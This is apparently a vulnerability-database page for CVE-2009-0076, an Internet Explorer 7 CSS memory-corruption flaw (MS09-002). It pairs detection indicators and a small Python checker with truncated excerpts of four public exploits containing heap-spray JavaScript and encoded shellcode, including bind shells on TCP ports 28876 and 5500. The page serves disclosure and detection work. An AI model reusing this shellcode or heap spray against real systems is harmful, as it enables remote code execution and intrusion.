CVE-2009-0076
Published: 2009-02-10
Priority: P356 · Severity: critical · CVSS 2.0 base score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit: public exploit code available (see the Exploit-DB entries below)
EPSS: 33.54% (98.2th percentile)
Microsoft Internet Explorer 7, when XHTML strict mode is used, allows remote attackers to execute arbitrary code via the zoom style directive in conjunction with unspecified other directives in a malformed Cascading Style Sheets (CSS) stylesheet in a crafted HTML document, aka "CSS Memory Corruption Vulnerability."
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
Detection & IOCs (extracted from sources)
Heap spray NOP sled bytes (JavaScript unescape sequences):
- bytes: %u0c0c%u0c0c
- bytes: %u0D0D%u0D0D
- bytes: %u0C0C%u0C0C
- The exploit delivers a crafted HTML page containing a JavaScript heap spray using the NOP sled value 0x0c0c0c0c; detect large repeated allocations of %u0c0c%u0c0c or %u0D0D%u0D0D in JavaScript on IE7 page loads.
- The exploit is served over HTTP on port 80 by a rogue Python HTTPServer; the Server header is set to 'myRequestHandler', which can be used as a network detection indicator.
- The exploit targets Internet Explorer 7.0.5730.11 on Windows XP SP2 and Windows 2003 SP2; scope detection to those specific User-Agent strings combined with CSS containing the zoom directive.
- The vulnerability is triggered by the CSS 'zoom' style directive in XHTML strict mode; inspect CSS content in HTTP responses for 'zoom' combined with other directives in malformed stylesheets delivered to IE7 clients.
- The post-exploitation bind shell listens on TCP/28876; monitor for unexpected inbound connections to this port on Windows XP/2003 hosts after IE7 exploitation.
- The post-exploitation bind shell listens on TCP/5500 (ShikataGaNai-encoded payload); monitor for unexpected inbound connections to port 5500 on Windows 2003 SP2 hosts after IE7 exploitation.
- A heap spray block size of 0x40000 (262144 bytes) filled with the repeated 0x0c0c0c0c pattern is characteristic of this exploit; memory forensics or heap inspection can identify this pattern.
- Exploit (8152) uses a calc.exe payload (win32_exec) as a proof of concept; real-world attacks would substitute a different shellcode, so the heap spray NOP sled and the 0x0c0c0c0c return address are the stable detection anchors, not the specific payload bytes.
- Exploit (8080) shellcode is encoded with ShikataGaNai; raw byte signatures will not match after re-encoding. Detect via the heap spray pattern and the bind port rather than static shellcode bytes.
- Exploit (8079) shellcode opens a bind shell on port 28876/tcp; the port is hardcoded in the shellcode and may differ in modified variants.
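As an added example (not part of this CVE record or of the Exploit-DB entries below), a small Python checker that applies the indicators listed above to one HTTP request/response pair; the User-Agent string, the two sample bodies and the header dictionaries are constructed for illustration.

```python
import re

# Body indicators taken from the detection notes for CVE-2009-0076 (MS09-002).
BODY_PATTERNS = {
    'heap-spray-sled': re.compile(r'(?:%u0[cd]0[cd]){2,}', re.I),  # %u0c0c%u0c0c / %u0D0D%u0D0D
    'spray-block-0x40000': re.compile(r'0x40000\b', re.I),         # 262144-byte spray blocks
    'css-zoom': re.compile(r'\bzoom\s*:', re.I),                   # the triggering style directive
    'xhtml-strict': re.compile(r'XHTML 1\.0 Strict', re.I),        # strict mode is required
}
ROGUE_SERVER = 'myRequestHandler'          # Server header of the rogue Python HTTPServer
IE7_UA_RE = re.compile(r'MSIE 7\.0')       # scope the CSS check to IE7 clients


def analyze(req_headers, resp_headers, body):
    """Return (sorted indicator names, alert flag) for one HTTP exchange."""
    hits = [name for name, rx in BODY_PATTERNS.items() if rx.search(body)]
    if resp_headers.get('Server') == ROGUE_SERVER:
        hits.append('rogue-server-header')
    ie7 = bool(IE7_UA_RE.search(req_headers.get('User-Agent', '')))
    # A spray sled or the rogue Server header is enough on its own; the CSS
    # trigger only matters for an IE7 client receiving an XHTML strict document.
    alert = ('heap-spray-sled' in hits or 'rogue-server-header' in hits
             or (ie7 and 'css-zoom' in hits and 'xhtml-strict' in hits))
    return sorted(hits), alert


# Constructed samples (hypothetical, not captured traffic).
UA_IE7 = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
SUSPECT_BODY = (
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">'
    '<style>.x { zoom: 1; }</style>'
    '<script>var b = unescape("%u0c0c%u0c0c"); while (b.length < 0x40000) b += b;</script>'
)
BENIGN_BODY = '<!DOCTYPE html><style>img { zoom: 1; }</style><script>var s = unescape("%20");</script>'

if __name__ == '__main__':
    for label, hdrs, body in (('suspect', {'Server': ROGUE_SERVER}, SUSPECT_BODY),
                              ('benign', {'Server': 'Apache'}, BENIGN_BODY)):
        print(label, analyze({'User-Agent': UA_IE7}, hdrs, body))
```

A lone 'zoom' declaration is common in legitimate IE-era CSS, which is why the checker only raises on it together with the strict DOCTYPE and an IE7 client.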
No detection rules found.
Exploit-DB · 2009-03-04 · Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
---
#
# Author : Ahmed Obied ([email protected])
#
# - Based on the code found by str0ke in the wild for MS09-002
# - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
# Usage : python ie_ms09002.py [port]
#
import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
payload += '\xe4\x36\x3a\x
Exploit-DB · 2009-02-20 · Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)
---
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evill Shellcode go ahead !!!
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031
Exploit-DB · 2009-02-20 · Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
---
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.lengthwindow.setTimeout("ok();",800);
# milw0rm.com [2009-02-20]
Exploit-DB · 2009-02-20 · Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
---
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team (ReL1K) #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
try:
import psyco
psyco.full()
except ImportErro
No writeups or analysis indexed.
References:
- http://www.us-cert.gov/cas/techalerts/TA09-041A.html
- http://www.vupen.com/english/advisories/2009/0389
- http://www.zerodayinitiative.com/advisories/ZDI-09-012/
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-002
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6081